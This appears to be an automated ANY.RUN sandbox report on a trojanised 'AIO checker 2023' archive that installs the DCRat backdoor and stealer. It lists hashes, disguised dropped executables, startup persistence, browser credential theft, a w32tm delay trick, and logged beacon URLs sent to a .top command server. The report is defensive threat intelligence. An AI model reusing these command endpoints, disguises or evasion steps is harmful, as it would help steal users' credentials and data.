File name: AIO checker 2023 (2).rar

Full analysis: https://app.any.run/tasks/d67b2422-1e85-46bd-9238-d88eaf64819a
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Analysis date: December 15, 2023, 12:16:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: rat, backdoor, dcrat, remote, stealer, evasion
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: ED59C40EC1BE02856C7A0DA7E309FE05
SHA1: 97717210D952501008660E5AF299AD0D42C943EF
SHA256: D92760B6477B5C838A89A92B89BD43A5C2EAA45B87A83B20AED7E1458681FA39
SSDEEP: 98304:pnWJalmizvfKjDdMUKtb1f1swkiDndXU5l1tkCvIHRSMRPc+kidvgjm+MnfpR80x:YoXHqPNqqZwWDS7jlZcH+G4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • AIO checker 2023.exe (PID: 2600)
      • ms_update.exe (PID: 2976)
    • Create files in the Startup directory

      • ms_update.exe (PID: 2976)
    • DCRAT has been detected (SURICATA)

      • ms_updater.exe (PID: 240)
    • Steals credentials from Web Browsers

      • ms_updater.exe (PID: 240)
    • Connects to the CnC server

      • ms_updater.exe (PID: 240)
    • Steals credentials

      • ms_updater.exe (PID: 240)
    • Actions looks like stealing of personal data

      • ms_updater.exe (PID: 240)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 2956)
    • Reads the Internet Settings

      • AIO checker 2023.exe (PID: 2600)
      • ms_updater.exe (PID: 240)
    • Reads settings of System Certificates

      • ms_updater.exe (PID: 240)
    • Checks for external IP

      • ms_updater.exe (PID: 240)
    • Adds/modifies Windows certificates

      • ms_updater.exe (PID: 240)
    • Reads browser cookies

      • ms_updater.exe (PID: 240)
    • Loads DLL from Mozilla Firefox

      • ms_updater.exe (PID: 240)
    • Executing commands from a ".bat" file

      • ms_updater.exe (PID: 240)
    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 2100)
    • Starts CMD.EXE for commands execution

      • ms_updater.exe (PID: 240)
  • INFO

    • Reads the computer name

      • wmpnscfg.exe (PID: 1852)
      • AIO checker 2023.exe (PID: 2600)
      • ms_update.exe (PID: 2976)
      • ms_updater.exe (PID: 240)
      • wmpnscfg.exe (PID: 2536)
    • Checks supported languages

      • wmpnscfg.exe (PID: 1852)
      • AIO checker 2023.exe (PID: 2600)
      • ms_update.exe (PID: 2976)
      • ms_updater.exe (PID: 240)
      • wmpnscfg.exe (PID: 2536)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 1852)
      • AIO checker 2023.exe (PID: 2600)
      • wmpnscfg.exe (PID: 2536)
    • Creates files or folders in the user directory

      • AIO checker 2023.exe (PID: 2600)
      • ms_update.exe (PID: 2976)
    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 2956)
    • Reads the machine GUID from the registry

      • ms_update.exe (PID: 2976)
      • ms_updater.exe (PID: 240)
    • Reads product name

      • ms_updater.exe (PID: 240)
    • Create files in a temporary directory

      • ms_updater.exe (PID: 240)
    • Reads Environment values

      • ms_updater.exe (PID: 240)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
All screenshots are available in the full report
Total processes: 50
Monitored processes: 9
Malicious processes: 2
Suspicious processes: 1

Behavior graph

Processes shown in the graph, in the order listed in the report ("no specs" marks nodes without special indicators): start, winrar.exe (no specs), wmpnscfg.exe (no specs), aio checker 2023.exe (no specs), ms_update.exe, ms_updater.exe (no specs), ms_updater.exe (#DCRAT), wmpnscfg.exe (no specs), cmd.exe (no specs), w32tm.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 240
CMD: "C:\Users\admin\AppData\Roaming\ms_updater.exe"
Path: C:\Users\admin\AppData\Roaming\ms_updater.exe
Parent process: AIO checker 2023.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\users\admin\appdata\roaming\ms_updater.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
PID: 1852
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 2100
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\qRWrI7b4Ni.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: ms_updater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2536
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 2600
CMD: "C:\Users\admin\Desktop\AIO checker 2023.exe"
Path: C:\Users\admin\Desktop\AIO checker 2023.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\aio checker 2023.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2868
CMD: "C:\Users\admin\AppData\Roaming\ms_updater.exe"
Path: C:\Users\admin\AppData\Roaming\ms_updater.exe
Parent process: AIO checker 2023.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Version:
5.15.2.0
Modules
Images
c:\users\admin\appdata\roaming\ms_updater.exe
c:\windows\system32\ntdll.dll
PID: 2956
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\AIO checker 2023 (2).rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 2976
CMD: "C:\Users\admin\AppData\Roaming\ms_update.exe"
Path: C:\Users\admin\AppData\Roaming\ms_update.exe
Parent process: AIO checker 2023.exe
User:
admin
Company:
System32 1989-2023
Integrity Level:
MEDIUM
Description:
System32
Exit code:
0
Version:
15.6.13.6
Modules
Images
c:\users\admin\appdata\roaming\ms_update.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 3304
CMD: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Path: C:\Windows\System32\w32tm.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Time Service Diagnostic Tool
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\w32tm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events: 7 186
Read events: 7 128
Write events: 58
Delete events: 0

Modification events

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Desktop\phacker.zip

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation: write
Name: Placement
Value: 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000

(PID) Process: (2956) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\General
Operation: write
Name: LastFolder
Value: C:\Users\admin\Desktop
Executable files: 7
Suspicious files: 27
Text files: 4
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 2956 | Process: WinRAR.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa2956.10590\DscCore.dll
MD5: 392A0DF275F04FF940215D4CAFDB257E
SHA256: C4084F617ED1DFDACA814CC9375A62D1FB466226F36AA53255C33B108725F29F

PID: 2600 | Process: AIO checker 2023.exe | Type: executable
Filename: C:\Users\admin\AppData\Roaming\ms_update.exe
MD5: 8597488355F310BC0046FD9F3EB87C6B
SHA256: 9FA04A8D42F65ABDD06306941A8E83078BB74F70C508FB8030586759A6D408E5

PID: 2956 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa2956.10590\README.txt
MD5: 229BFB07694F123E2CB4986F47100A62
SHA256: 8DF26B1F550C80646F01D25B8AAFCABB1342BBB2BE1CD335CDB8D254BE8C4090

PID: 2600 | Process: AIO checker 2023.exe | Type: executable
Filename: C:\Users\admin\AppData\Roaming\ms_updater.exe
MD5: 5CEE940B52DA0E967FECB1133B6304D0
SHA256: 0CBC0042EA0C1F235C35CFC40A62D29A5D794535FA164DFB57F7B90334FFE767

PID: 2976 | Process: ms_update.exe | Type: executable
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe
MD5: 8597488355F310BC0046FD9F3EB87C6B
SHA256: 9FA04A8D42F65ABDD06306941A8E83078BB74F70C508FB8030586759A6D408E5

PID: 240 | Process: ms_updater.exe | Type: compressed
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
MD5: AC05D27423A85ADC1622C714F2CB6184
SHA256: C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D

PID: 240 | Process: ms_updater.exe | Type: binary
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
MD5: 205AF8610D3A38592ECD27E743D4A230
SHA256: AC947D74C2B5EC25A5681DD170609033677A95FFBD79531FE6435F6519B507E1

PID: 240 | Process: ms_updater.exe | Type: compressed
Filename: C:\Users\admin\AppData\Local\Temp\Cab6D4F.tmp
MD5: AC05D27423A85ADC1622C714F2CB6184
SHA256: C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D

PID: 240 | Process: ms_updater.exe | Type: sqlite
Filename: C:\Users\admin\AppData\Local\Temp\HG01wmyA9C
MD5: 1AA08FF2105515DE3602F503E87DFF1A
SHA256: D7446E2F307027C9BDA2A92D1DF1C13C376581372F6AE8708F4D5BACCB2E6813

PID: 240 | Process: ms_updater.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\t48dHzGvIj
MD5: 7BF4D915FC584F3478CF6E185817A081
SHA256: 0B7F27859DD53ADFFFC4F03AB58FF48F7F36BD748D46CB75656A8481B563625D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 15
TCP/UDP connections: 9
DNS requests: 4
Threats: 7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W
unknown
text
104 b
unknown
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?8jxSizLu1nSOFo4QfTbv8ZU=WWq4J3FXE2dzcBYDuL4g7Xrf7AS&FwuiP76LJRk7h4JNLFye=YBwey28oK6JldSSH4kfFM3cl78COe&17789cb3578c6680ba919ed580bcbc59=c33b5fda8c587ac7ab22b49b86ea1260&024ace78b46de9dec7d33cd74bf374d2=AM5gzYmdjMklTM3QGNjJjNkdzY1QjYjFTMjhzM5YTN4UGNxgTZ3ITZ&8jxSizLu1nSOFo4QfTbv8ZU=WWq4J3FXE2dzcBYDuL4g7Xrf7AS&FwuiP76LJRk7h4JNLFye=YBwey28oK6JldSSH4kfFM3cl78COe
unknown
text
436 b
unknown
240
ms_updater.exe
GET
200
95.101.54.195:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a96c512dd8f7bee7
unknown
compressed
65.2 Kb
unknown
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W
unknown
text
104 b
unknown
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&9d68fd20db10d46579acac1fdc533db7=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
unknown
text
104 b
unknown
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W&4b3611644f70fc2d5fba382ed48274b0=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
unknown
text
104 b
unknown
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nIlZDOkFTNiZGNwMTOlFjYkljM4IDNlFjN2UDMwUWOlVzYlZWOkFmYlJiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W
unknown
text
104 b
unknown
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W&4b3611644f70fc2d5fba382ed48274b0=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
unknown
text
104 b
unknown
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W
unknown
text
104 b
unknown
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&9d68fd20db10d46579acac1fdc533db7=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
unknown
text
104 b
unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2588
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
240
ms_updater.exe
172.67.34.170:443
pastebin.com
CLOUDFLARENET
US
unknown
240
ms_updater.exe
172.67.129.42:80
714745cm.nyashland.top
CLOUDFLARENET
US
unknown
240
ms_updater.exe
34.117.186.192:443
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
unknown
240
ms_updater.exe
95.101.54.195:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown

DNS requests

Domain
IP
Reputation
pastebin.com
  • 172.67.34.170
  • 104.20.67.143
  • 104.20.68.143
shared
714745cm.nyashland.top
  • 172.67.129.42
  • 104.21.1.107
unknown
ipinfo.io
  • 34.117.186.192
shared
ctldl.windowsupdate.com
  • 95.101.54.195
  • 95.101.54.121
  • 95.101.54.136
  • 95.101.54.113
  • 95.101.54.105
whitelisted

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
240
ms_updater.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
240
ms_updater.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
240
ms_updater.exe
Device Retrieving External IP Address Detected
ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
240
ms_updater.exe
Device Retrieving External IP Address Detected
ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)
240
ms_updater.exe
A Network Trojan was detected
ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
1 ETPRO signatures available at the full report
No debug info